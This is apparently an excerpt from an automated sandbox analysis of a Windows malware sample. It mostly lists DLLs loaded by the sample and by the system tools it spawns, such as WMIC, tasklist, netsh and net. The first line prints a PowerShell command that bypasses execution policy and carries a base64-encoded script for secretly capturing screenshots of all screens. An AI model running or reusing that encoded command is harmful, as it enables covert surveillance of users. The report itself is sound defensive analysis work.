            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: libffi-7.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: libcrypto-1_1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: libssl-1_1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: sbiedll.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
